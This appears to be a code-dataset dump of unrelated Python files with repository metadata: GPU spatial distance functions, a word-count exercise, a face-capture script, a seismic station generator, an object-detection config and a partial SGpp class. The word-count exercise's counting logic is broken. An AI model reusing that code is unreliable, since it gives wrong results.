if len(points1) == 0:
return cudf.Series(dtype="float64")
if not contains_only_points(points1):
raise ValueError("`points1` array must contain only points")
if not contains_only_points(points2):
raise ValueError("`points2` array must contain only points")
if (len(points1.points.xy) > 0 and len(points1.multipoints.xy) > 0) or (
len(points2.points.xy) > 0 and len(points2.multipoints.xy) > 0
):
raise NotImplementedError(
"Mixing point and multipoint geometries is not supported"
)
(
lhs_column,
lhs_point_collection_type,
) = _extract_point_column_and_collection_type(points1)
(
rhs_column,
rhs_point_collection_type,
) = _extract_point_column_and_collection_type(points2)
return Series._from_data(
{
None: cpp_pairwise_point_distance(
lhs_point_collection_type,
rhs_point_collection_type,
lhs_column,
rhs_column,
)
}
)
def pairwise_linestring_distance(
multilinestrings1: GeoSeries, multilinestrings2: GeoSeries
):
"""Compute distance between (multi)linestring-(multi)linestring pairs
The shortest distance between two linestrings is defined as the shortest
distance between all pairs of segments of the two linestrings. If any of
the segments intersect, the distance is 0.
Parameters
----------
multilinestrings1 : GeoSeries
A GeoSeries of (multi)linestrings
multilinestrings2 : GeoSeries
A GeoSeries of (multi)linestrings
Returns
-------
distance : cudf.Series
the distance between each pair of linestrings
Examples
--------
>>> from shapely.geometry import LineString, MultiLineString
>>> ls1 = cuspatial.GeoSeries([
... LineString([(0, 0), (1, 1)]),
... LineString([(1, 0), (2, 1)])
... ])
>>> ls2 = cuspatial.GeoSeries([
... MultiLineString([
... LineString([(-1, 0), (-2, -1)]),
... LineString([(-2, -1), (-3, -2)])
... ]),
... MultiLineString([
... LineString([(0, -1), (0, -2), (0, -3)]),
... LineString([(0, -3), (-1, -3), (-2, -3)])
... ])
... ])
>>> cuspatial.pairwise_linestring_distance(ls1, ls2)
0 1.000000
1 1.414214
dtype: float64
"""
if not len(multilinestrings1) == len(multilinestrings2):
raise ValueError(
"`multilinestrings1` and `multilinestrings2` must have the same "
"length"
)
if len(multilinestrings1) == 0:
return cudf.Series(dtype="float64")
if not contains_only_linestrings(
multilinestrings1
) or not contains_only_linestrings(multilinestrings2):
raise ValueError(
"`multilinestrings1` and `multilinestrings2` must contain only "
"linestrings"
)
if len(multilinestrings1) == 0:
return cudf.Series(dtype="float64")
return Series._from_data(
{
None: cpp_pairwise_linestring_distance(
multilinestrings1.lines.column(),
multilinestrings2.lines.column(),
)
}
)
def pairwise_point_linestring_distance(
points: GeoSeries, linestrings: GeoSeries
):
"""Compute distance between (multi)points-(multi)linestrings pairs
The distance between a (multi)point and a (multi)linestring
is defined as the shortest distance between every point in the
multipoint and every line segment in the multilinestring.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)point in `points` and the ith
(multi)linestring in `linestrings`.
Parameters
----------
points : GeoSeries
The (multi)points to compute the distance from.
linestrings : GeoSeries
The (multi)linestrings to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
The input `GeoSeries` must contain a single type geometry.
For example, `points` series cannot contain both points and polygons.
Currently, it is unsupported that `points` contains both points and
multipoints.
Examples
--------
**Compute distances between point array to linestring arrays**
>>> from shapely.geometry import (
... Point, MultiPoint, LineString, MultiLineString
... )
>>> import geopandas as gpd, cuspatial
>>> pts = cuspatial.from_geopandas(gpd.GeoSeries([
... Point(0.0, 0.0), Point(1.0, 1.0), Point(2.0, 2.0)
... ]))
>>> mlines = cuspatial.from_geopandas(gpd.GeoSeries(
... [
... LineString([Point(-1.0, 0.0),
... Point(-0.5, -0.5),
... Point(-1.0, -0.5),
... Point(-0.5, -1.0)]),
... LineString([Point(8.0, 10.0),
... Point(11.21, 9.48),
... Point(7.1, 12.5)]),
... LineString([Point(1.0, 0.0), Point(0.0, 1.0)]),
... ]))
>>> cuspatial.pairwise_point_linestring_distance(pts, mlines)
0 0.707107
1 11.401754
2 2.121320
dtype: float64
**Compute distances between multipoint to multilinestring arrays**
>>> # 3 pairs of multi points containing 3 points each
>>> ptsdata = [
... [[9, 7], [0, 6], [7, 2]],
... [[5, 8], [5, 7], [6, 0]],
... [[8, 8], [6, 7], [4, 1]],
... ]
>>> # 3 pairs of multi linestrings containing 2 linestrings each
>>> linesdata = [
... [
... [[86, 47], [31, 17], [84, 16], [14, 63]],
... [[14, 36], [90, 73], [72, 66], [0, 5]],
... ],
... [
... [[36, 90], [29, 31], [91, 70], [25, 78]],
... [[61, 64], [89, 20], [94, 46], [37, 44]],
... ],
... [
... [[60, 76], [29, 60], [53, 87], [8, 18]],
... [[0, 16], [79, 14], [3, 6], [98, 89]],
... ],
... ]
>>> pts = cuspatial.from_geopandas(
... gpd.GeoSeries(map(MultiPoint, ptsdata))
... )
>>> lines = cuspatial.from_geopandas(
... gpd.GeoSeries(map(MultiLineString, linesdata))
... )
>>> cuspatial.pairwise_point_linestring_distance(pts, lines)
0 0.762984
1 33.241540
2 0.680451
dtype: float64
"""
if not contains_only_points(points):
raise ValueError("`points` array must contain only points")
if not contains_only_linestrings(linestrings):
raise ValueError("`linestrings` array must contain only linestrings")
if len(points.points.xy) > 0 and len(points.multipoints.xy) > 0:
raise NotImplementedError(
"Mixing point and multipoint geometries is not supported"
)
(
point_column,
point_collection_type,
) = _extract_point_column_and_collection_type(points)
return Series._from_data(
{
None: c_pairwise_point_linestring_distance(
point_collection_type,
point_column,
linestrings.lines.column(),
)
}
)
def pairwise_point_polygon_distance(points: GeoSeries, polygons: GeoSeries):
"""Compute distance between (multi)points-(multi)polygons pairs
The distance between a (multi)point and a (multi)polygon
is defined as the shortest distance between every point in the
multipoint and every edge of the (multi)polygon. If the multipoint and
multipolygon intersects, the distance is 0.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)point in `points` and the ith
(multi)polygon in `polygons`.
Parameters
----------
points : GeoSeries
The (multi)points to compute the distance from.
polygons : GeoSeries
The (multi)polygons to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
The input `GeoSeries` must contain a single type geometry.
For example, `points` series cannot contain both points and polygons.
Currently, it is unsupported that `points` contains both points and
multipoints.
Examples
--------
Compute distance between a point and a polygon:
>>> from shapely.geometry import Point
>>> points = cuspatial.GeoSeries([Point(0, 0)])
>>> polygons = cuspatial.GeoSeries([Point(1, 1).buffer(0.5)])
>>> cuspatial.pairwise_point_polygon_distance(points, polygons)
0 0.914214
dtype: float64
Compute distance between a multipoint and a multipolygon
>>> from shapely.geometry import MultiPoint
>>> mpoints = cuspatial.GeoSeries([MultiPoint([Point(0, 0), Point(1, 1)])])
>>> mpolys = cuspatial.GeoSeries([
... MultiPoint([Point(2, 2), Point(1, 2)]).buffer(0.5)])
>>> cuspatial.pairwise_point_polygon_distance(mpoints, mpolys)
0 0.5
dtype: float64
"""
if len(points) != len(polygons):
raise ValueError("Unmatched input geoseries length.")
if len(points) == 0:
return cudf.Series(dtype=points.points.xy.dtype)
if not contains_only_points(points):
raise ValueError("`points` array must contain only points")
if not contains_only_polygons(polygons):
raise ValueError("`polygons` array must contain only polygons")
if len(points.points.xy) > 0 and len(points.multipoints.xy) > 0:
raise NotImplementedError(
"Mixing point and multipoint geometries is not supported"
)
(
points_column,
point_collection_type,
) = _extract_point_column_and_collection_type(points)
polygon_column = polygons.polygons.column()
return Series._from_data(
{
None: c_pairwise_point_polygon_distance(
point_collection_type, points_column, polygon_column
)
}
)
def pairwise_linestring_polygon_distance(
linestrings: GeoSeries, polygons: GeoSeries
):
"""Compute distance between (multi)linestrings-(multi)polygons pairs.
The distance between a (multi)linestrings and a (multi)polygon
is defined as the shortest distance between every segment in the
multilinestring and every edge of the (multi)polygon. If the
multilinestring and multipolygon intersect, the distance is 0.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)linestring in `linestrings` and the ith
(multi)polygon in `polygons`.
Parameters
----------
linestrings : GeoSeries
The (multi)linestrings to compute the distance from.
polygons : GeoSeries
The (multi)polygons to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
The input `GeoSeries` must contain a single type geometry.
For example, `linestrings` series cannot contain both linestrings and
polygons.
Examples
--------
Compute distance between a linestring and a polygon:
>>> from shapely.geometry import LineString, Polygon
>>> lines = cuspatial.GeoSeries([
... LineString([(0, 0), (1, 1)])])
>>> polys = cuspatial.GeoSeries([
... Polygon([(-1, -1), (-1, 0), (-2, 0), (-1, -1)])
... ])
>>> cuspatial.pairwise_linestring_polygon_distance(lines, polys)
0 1.0
dtype: float64
Compute distance between a multipoint and a multipolygon
>>> from shapely.geometry import MultiLineString, MultiPolygon
>>> lines = cuspatial.GeoSeries([
... MultiLineString([
... LineString([(0, 0), (1, 1)]),
... LineString([(1, 1), (2, 2)])])
... ])
>>> polys = cuspatial.GeoSeries([
... MultiPolygon([
... Polygon([(-1, -1), (-1, 0), (-2, 0), (-1, -1)]),
... Polygon([(-2, 0), (-3, 0), (-3, -1), (-2, 0)])])
... ])
>>> cuspatial.pairwise_linestring_polygon_distance(lines, polys)
0 1.0
dtype: float64
"""
if len(linestrings) != len(polygons):
raise ValueError("Unmatched input geoseries length.")
if len(linestrings) == 0:
return cudf.Series(dtype=linestrings.lines.xy.dtype)
if not contains_only_linestrings(linestrings):
raise ValueError("`linestrings` array must contain only linestrings")
if not contains_only_polygons(polygons):
raise ValueError("`polygon` array must contain only polygons")
linestrings_column = linestrings.lines.column()
polygon_column = polygons.polygons.column()
return Series._from_data(
{None: c_pairwise_line_poly_dist(linestrings_column, polygon_column)}
)
def pairwise_polygon_distance(polygons1: GeoSeries, polygons2: GeoSeries):
"""Compute distance between (multi)polygon-(multi)polygon pairs.
The distance between two (multi)polygons is defined as the shortest
distance between any edge of the first (multi)polygon and any edge
of the second (multi)polygon. If two (multi)polygons intersect, the
distance is 0.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)polygon in `polygons1` and the ith
(multi)polygon in `polygons2`.
Parameters
----------
polygons1 : GeoSeries
The (multi)polygons to compute the distance from.
polygons2 : GeoSeries
The (multi)polygons to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
`polygons1` and `polygons2` must contain only polygons.
Examples
--------
Compute distance between polygons:
>>> from shapely.geometry import Polygon, MultiPolygon
>>> s0 = cuspatial.GeoSeries([
... Polygon([(0, 0), (1, 0), (1, 1), (0, 1), (0, 0)])])
>>> s1 = cuspatial.GeoSeries([
... Polygon([(2, 2), (3, 2), (3, 3), (2, 2)])])
>>> cuspatial.pairwise_polygon_distance(s0, s1)
0 1.414214
dtype: float64
Compute distance between multipolygons:
>>> s0 = cuspatial.GeoSeries([
... MultiPolygon([
... Polygon([(0, 0), (1, 0), (1, 1), (0, 1), (0, 0)]),
... Polygon([(2, 0), (3, 0), (3, 1), (2, 0)])])])
>>> s1 = cuspatial.GeoSeries([
... MultiPolygon([
... Polygon([(-1, 0), (-2, 0), (-2, -1), (-1, -1), (-1, 0)]),
... Polygon([(0, -1), (1, -1), (1, -2), (0, -2), (0, -1)])])])
>>> cuspatial.pairwise_polygon_distance(s0, s1)
0 1.0
dtype: float64
"""
if len(polygons1) != len(polygons2):
raise ValueError("Unmatched input geoseries length.")
if len(polygons1) == 0:
return cudf.Series(dtype=polygons1.lines.xy.dtype)
if not contains_only_polygons(polygons1):
raise ValueError("`polygons1` array must contain only polygons")
if not contains_only_polygons(polygons2):
raise ValueError("`polygons2` array must contain only polygons")
polygon1_column = polygons1.polygons.column()
polygon2_column = polygons2.polygons.column()
return Series._from_data(
{None: c_pairwise_polygon_distance(polygon1_column, polygon2_column)}
)
def _extract_point_column_and_collection_type(s: GeoSeries):
"""Given a GeoSeries that contains only points or multipoints, return
the point or multipoint column and the collection type of the GeoSeries.
"""
point_collection_type = (
CollectionType.SINGLE if len(s.points.xy > 0) else CollectionType.MULTI
)
if point_collection_type == CollectionType.SINGLE:
return s.points.column(), point_collection_type
else:
return s.multipoints.column(), point_collection_type
|
[
"noreply@github.com"
] |
rapidsai.noreply@github.com
|
07e7df0816c1957b767384afad42bcae44dc81fd
|
1b966dfe5516ac1cc080ff9305104b0b31463f00
|
/word-count/word_count.py
|
ddb6e542a8ddff1c3263eef9c7623f8ad95d3b5e
|
[] |
no_license
|
Nephasis/exercismPython
|
877f9b0906b6882c99a747f98124bcea3c4cbeeb
|
4ca9481ceb555c7b7427d255500720a938d47f25
|
refs/heads/master
| 2021-07-06T09:55:16.483723
| 2017-10-02T16:52:35
| 2017-10-02T16:52:35
| 105,559,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
import re
def words_split(sentence):
words = re.sub("[^a-zA-Z0-9]", " ", sentence.lower()).split()
return words
def word_count(sentence):
words_dict = {}
words = re.sub("[^a-zA-Z0-9]", " ", sentence.lower()).split()
print words
for i in words:
z = 1
print i
if words[z] == i:
z += 1
else:
pass
words_dict[i] = z
print words_dict
|
[
"martyna.zaa@gmail.com"
] |
martyna.zaa@gmail.com
|
c610d3b2b1ed632057809c123585fd8cbb40363f
|
cdcb58cddf422079e27550d4db344cb634b2806e
|
/record_facesepimg.py
|
537d43c5025c048e8d51f4ac09bb17b336dbefb3
|
[] |
no_license
|
JeeveshJoshi/Home-Security-Solution-Using-Facial-Recognition
|
a26a468b131c11efcffae97d1fb8a87702d46e76
|
e2028d4fa5f783d4c6f590ce643ed65fffe40502
|
refs/heads/master
| 2022-08-06T23:59:10.928273
| 2020-05-28T17:51:50
| 2020-05-28T17:51:50
| 267,657,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 936
|
py
|
import cv2
import numpy as np
import sqlite3
import os
conn = sqlite3.connect('database.db')
if not os.path.exists('./dataset'):
os.makedirs('./dataset')
c = conn.cursor()
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture('t2.mp4')
uname = input("Enter your name: ")
c.execute('INSERT INTO users (name) VALUES (?)', (uname,))
uid = c.lastrowid
sampleNum = 0
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
sampleNum = sampleNum+1
cv2.imwrite("dataset/User."+str(uid)+"."+str(sampleNum)+".jpg",gray[y:y+h,x:x+w])
cv2.rectangle(img, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.waitKey(100)
cv2.imshow('img',img)
cv2.waitKey(1);
if sampleNum > 150:
break
cap.release()
conn.commit()
conn.close()
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
JeeveshJoshi.noreply@github.com
|
205b5a1ec4dae46d7dc21465fb1acc9354c8e8a4
|
244ecfc2017a48c70b74556be8c188e7a4815848
|
/res/scripts/client/gui/prb_control/functional/__init__.py
|
3c9b3da695003de294a48c0ffe4eae03d5b61bb6
|
[] |
no_license
|
webiumsk/WOT-0.9.12
|
c1e1259411ba1e6c7b02cd6408b731419d3174e5
|
5be5fd9186f335e7bae88c9761c378ff5fbf5351
|
refs/heads/master
| 2021-01-10T01:38:36.523788
| 2015-11-18T11:33:37
| 2015-11-18T11:33:37
| 46,414,438
| 1
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 820
|
py
|
# 2015.11.18 11:52:50 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/prb_control/functional/__init__.py
from constants import IS_DEVELOPMENT
def initDevFunctional():
if IS_DEVELOPMENT:
try:
from gui.development.dev_prebattle import init
except ImportError:
def init():
pass
init()
def finiDevFunctional():
if IS_DEVELOPMENT:
try:
from gui.development.dev_prebattle import fini
except ImportError:
def fini():
pass
fini()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\prb_control\functional\__init__.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.18 11:52:50 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
784f981f27b845d2b714770887c997029b4fbecb
|
f6763d51437acf9b44eba1fe571f13a06439167f
|
/ses3d/make_stations.py
|
394d334d11f2d82c700a9fea8a301f9ffbc41098
|
[] |
no_license
|
xian-ran/seis_tools
|
335566f71eb975dab43c9b6c17b0a865be02581a
|
3a7b3f6b35e6d137924e8e95c6fac56681f772dc
|
refs/heads/master
| 2020-11-24T19:26:10.994293
| 2019-04-01T18:28:18
| 2019-04-01T18:28:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,820
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
#=======================================================
# Create grid of receivers for SES3d
#=======================================================
depth = 0.0
rec_names = []
rec_coors = []
#main station grid
d_lon = 0.5
d_lat = 0.5
lon_0 = -15.0
lon_e = 15.0
colat_0 = 75
colat_e = 105
lon = np.arange(lon_0,lon_e+(1*d_lon),d_lon)
colat = np.arange(colat_0,colat_e+(1*d_lat),d_lat)
#sparse station grid
d_lon2 = 3.0
d_lat2 = 3.0
lon2_0 = -30.0
lon2_e = 30.0
colat2_0 = 60.0
colat2_e = 120.0
lon2 = np.arange(lon2_0,lon2_e+(1*d_lon2),d_lon2)
colat2 = np.arange(colat2_0,colat2_e+(1*d_lat2),d_lat2)
total_receivers = len(lon)*len(colat) + len(lon2)*len(colat2)
m = Basemap(projection='ortho',lon_0=0.0,lat_0=0.0)
m.drawcoastlines()
parallels = np.arange(-90,90,15)
m.drawparallels(parallels)
meridians = np.arange(-90,90,15)
m.drawmeridians(meridians)
count = 1
for l in lon:
for c in colat:
rec_name = '{}''{:_>9}'.format('REC',str(count))
rec_coor = '{} {} {}'.format(c, l, depth)
rec_names.append(rec_name)
rec_coors.append(rec_coor)
count += 1
x1,y1 = m(l,90.0-c)
m.scatter(x1,y1)
for l in lon2:
for c in colat2:
if c < 75.0 or c > 105.0 or l < -15.0 or l > 15.0:
rec_name = '{}''{:_>9}'.format('REC',str(count))
rec_coor = '{} {} {}'.format(c, l, depth)
rec_names.append(rec_name)
rec_coors.append(rec_coor)
count += 1
x1,y1 = m(l,90.0-c)
m.scatter(x1,y1)
#write the station file
f = open('recfile_1','w')
f.write(str(len(rec_names))+'\n')
for i in range(0,len(rec_names)):
f.write(rec_names[i]+'\n')
f.write(rec_coors[i]+'\n')
plt.show()
|
[
"romaguir@porphyroblast.earth.lsa.umich.edu"
] |
romaguir@porphyroblast.earth.lsa.umich.edu
|
be412d528058f753a7b389f8cbfce506b85546f3
|
ae792370eceb39e303e6751ed596bc91b5571d47
|
/src/get_feature/configs/guided_anchoring/ga_htc.py
|
08d50332122224939af0155e01831545cb4a0727
|
[
"Apache-2.0"
] |
permissive
|
13282803166/-
|
587d2e0c10a1f2b3f22d181cc3386aa4f0e001f7
|
e0fdef286d5342ebaec2fe308f4c6f8994d559d1
|
refs/heads/main
| 2023-01-12T04:31:40.662915
| 2020-11-16T11:02:08
| 2020-11-16T11:02:08
| 313,269,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,553
|
py
|
# model settings
model = dict(
type='HybridTaskCascade',
pretrained='open-mmlab://resnext101_32x4d',
interleaved=True,
num_stages=3,
backbone=dict(
type='ResNeXt',
depth=101,
groups=32,
base_width=4,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=-1,
style='pytorch',
gen_attention=dict(spatial_range=-1, num_heads=8, attention_type='1111', kv_stride=2),
stage_with_gen_attention=[[], [], [0, 1, 2, 3, 4, 5], [0, 1, 2]],
dcn=dict(modulated=False, groups=32, deformable_groups=1, fallback_on_stride=False),
stage_with_dcn=(False, True, True, True)),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='GARPNHead',
in_channels=256,
feat_channels=256,
octave_base_scale=8,
scales_per_octave=3,
octave_ratios=[0.04, 0.1, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0],
anchor_strides=[4, 8, 16, 32, 64],
anchor_base_sizes=None,
anchoring_means=[.0, .0, .0, .0],
anchoring_stds=[0.07, 0.07, 0.14, 0.14],
target_means=(.0, .0, .0, .0),
target_stds=[0.07, 0.07, 0.11, 0.11],
loc_filter_thr=0.01,
loss_loc=dict(type='FocalLoss', use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=1.0),
loss_shape=dict(type='BoundedIoULoss', beta=0.2, loss_weight=1.0),
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=[
dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=True,
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1],
reg_class_agnostic=True,
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0.],
target_stds=[0.033, 0.033, 0.67, 0.67],
reg_class_agnostic=True,
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
])
# model training and testing settings
train_cfg = dict(
rpn=dict(
ga_assigner=dict(
type='ApproxMaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
ga_sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
center_ratio=0.2,
ignore_ratio=0.5,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=300,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='OHEMSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.6,
neg_iou_thr=0.6,
min_pos_iou=0.6,
ignore_iof_thr=-1),
sampler=dict(
type='OHEMSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.7,
min_pos_iou=0.7,
ignore_iof_thr=-1),
sampler=dict(
type='OHEMSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
],
stage_loss_weights=[1, 0.5, 0.25])
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=300,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(score_thr=0.05, nms=dict(type='nms', iou_thr=0.3), max_per_img=300),
keep_all_stages=False)
# dataset settings
dataset_type = 'VOCDataset'
data_root = '../../data/'
img_norm_cfg = dict(mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1024, 424), (2048, 848)],
multiscale_mode='range',
keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
#dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1536, 636), #0.5183
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=1,
workers_per_gpu=1,
train=dict(
type=dataset_type,
ann_file=data_root + 'ImageSets/Main/trainval.txt',
img_prefix=data_root,
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'ImageSets/Main/val.txt',
img_prefix=data_root,
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'ImageSets/Main/val.txt',
img_prefix=data_root,
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.0025, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[13, 16])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 17
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/get_feature'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"75088620@qq.com"
] |
75088620@qq.com
|
070247a137b4ed8efb5298e3b5558eb09767c14e
|
e37a4775935435eda9f176c44005912253a720d8
|
/datadriven/python/uq/analysis/asgc/ASGCKnowledge.py
|
2d5cee2138bd18097ee69c0b5a83f398141e11a7
|
[] |
no_license
|
JihoYang/SGpp
|
b1d90d2d9e8f8be0092e1a9fa0f37a5f49213c29
|
7e547110584891beed194d496e23194dd90ccd20
|
refs/heads/master
| 2020-04-25T10:27:58.081281
| 2018-09-29T19:33:13
| 2018-09-29T19:33:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,745
|
py
|
import numpy as np
from pysgpp.extensions.datadriven.uq.analysis import KnowledgeTypes
from pysgpp.extensions.datadriven.uq.operations.sparse_grid import copyGrid
from pysgpp import DataVector, Grid
import pysgpp.extensions.datadriven.uq.jsonLib as ju
import pysgpp.extensions.datadriven.utils.json as json
from pysgpp.extensions.datadriven.uq.analysis.asgc.ASGCKnowledgeFormatter import ASGCKnowledgeFormatter
class ASGCKnowledge(object):
"""
The ASGC knowledge class
"""
def __init__(self):
"""
Constructor
"""
# {iteration: {qoi: <Grid>}}
self.__grids = {}
# {iteration: {qoi: {dtype: {t: <DataVector>}}}}
self.__alphas = {}
self.__iteration = 0
@classmethod
def initWithStandardValues(cls, grid, alpha):
ans = ASGCKnowledge()
ans.update(grid, alpha, "_", 0, KnowledgeTypes.SIMPLE, 0)
return ans
def getAvailableQoI(self):
"""
get available quantities of interest
@return: list of strings identifying the quantities of interest
"""
if len(self.__alphas) == 0:
raise Exception('No knowledge available')
iteration = self.__alphas.iterkeys().next()
return self.__alphas[iteration].keys()
def getAvailableTimeSteps(self):
"""
get available time steps
@return: sorted list of floats
"""
if len(self.__alphas) == 0:
raise Exception('No knowledge available')
iteration = self.__alphas.iterkeys().next()
qoi = self.__alphas[iteration].iterkeys().next()
dtype = self.__alphas[iteration][qoi].iterkeys().next()
ts = self.__alphas[self.__iteration][qoi][dtype].keys()
return sorted(ts)
def getAvailableKnowledgeTypes(self):
"""
@return list of available KnowledgeTypes
"""
if len(self.__alphas) == 0:
raise Exception('No knowledge available')
iteration = self.__alphas.iterkeys().next()
qoi = self.__alphas[iteration].iterkeys().next()
return self.__alphas[iteration][qoi].keys()
def getAvailableIterations(self):
"""
get available iterations
@return: sorted list of integes
"""
return self.__grids.keys()
def getIteration(self):
"""
get current iteration number
"""
return self.__iteration
def setIteration(self, iteration):
"""
set current iteration number
"""
self.__iteration = iteration
def hasAlpha(self, iteration, qoi, t, dtype):
"""
Check if there is a coefficient vector for the given
configuration.
@param iteration: int iteration number
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
"""
return iteration in self.__alphas and \
qoi in self.__alphas[iteration] and \
dtype in self.__alphas[iteration][qoi] and \
t in self.__alphas[iteration][qoi][dtype]
def hasGrid(self, iteration, qoi):
"""
Check if there is a grid available for the given configuration
@param iteration: int iteration number
@param qoi: string quantity of interest
"""
return iteration in self.__grids and \
qoi in self.__grids[iteration]
def getGrid(self, qoi='_', iteration=None):
"""
Get the grid for the given configuration
@param qoi: string quantity of interest
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
if self.hasGrid(iteration, qoi):
return self.__grids[iteration][qoi]
else:
raise AttributeError('no grid for (i=%i, qoi=%s)' % (iteration,
qoi))
def getAlpha(self, qoi='_', t=0, dtype=KnowledgeTypes.SIMPLE,
iteration=None):
"""
Get the coefficient vector for the given configuration
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
@param iteration: int, iteration number
